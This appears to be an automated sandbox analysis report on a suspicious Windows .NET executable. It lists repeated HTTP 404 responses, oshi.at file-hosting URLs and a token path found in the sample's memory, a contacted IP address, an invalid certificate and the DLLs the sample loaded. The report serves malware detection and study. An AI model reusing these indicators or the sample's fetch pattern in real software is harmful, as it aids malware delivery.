Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:46 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:49 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:52 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:55 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:27:58 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:01 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:04 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:07 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:10 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:12 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:15 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:18 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:21 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:24 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:27 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:30 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:33 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:36 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:38 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:41 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:44 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:47 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:51 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:54 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:28:57 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:00 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:03 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:06 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:08 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:11 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:15 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:18 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:21 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:24 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:27 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:29 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:32 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:35 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:38 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:41 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:44 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:47 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:50 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:53 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:55 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:29:58 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:30:01 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:30:04 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:30:07 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:30:10 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:30:13 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:30:16 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:30:19 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:30:22 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:30:25 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:30:28 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 15:30:31 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: Ref_31020563.exeString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: Ref_31020563.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: Ref_31020563.exeString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: Ref_31020563.exeString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: Ref_31020563.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: Ref_31020563.exeString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: Ref_31020563.exeString found in binary or memory: http://ocsps.ssl.com0
Source: Ref_31020563.exeString found in binary or memory: http://ocsps.ssl.com0?
Source: Ref_31020563.exeString found in binary or memory: http://ocsps.ssl.com0_
Source: Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DDA000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.at
Source: Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DDA000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.atd
Source: Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Ref_31020563.exeString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: Ref_31020563.exeString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: Ref_31020563.exe, 00000000.00000002.3283542309.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E3E000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000003099000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F14000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000003095000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.000000000307D000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/somenonymous/OshiUpload
Source: Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
Source: Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/AQBP
Source: Ref_31020563.exeString found in binary or memory: https://oshi.at/AQBPKPAMhkUWREVZAdqU4bM.xStpkLwqD15MRB9YwOo
Source: Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/AQBPd
Source: Ref_31020563.exe, 00000000.00000002.3283542309.0000000002D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/AQBPto
Source: Ref_31020563.exeString found in binary or memory: https://www.ssl.com/repository0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: Ref_31020563.exeStatic PE information: invalid certificate
Source: Ref_31020563.exe, 00000000.00000002.3283207471.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ref_31020563.exe
Source: Ref_31020563.exe, 00000000.00000000.1413119282.00000000009EB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRef#.exe8 vs Ref_31020563.exe
Source: Ref_31020563.exeBinary or memory string: OriginalFilenameRef#.exe8 vs Ref_31020563.exe
Source: Ref_31020563.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal56.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\Ref_31020563.exeMutant created: NULL
Source: Ref_31020563.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Ref_31020563.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\Ref_31020563.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Ref_31020563.exeReversingLabs: Detection: 36%
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: schannel.dllJump to behavior
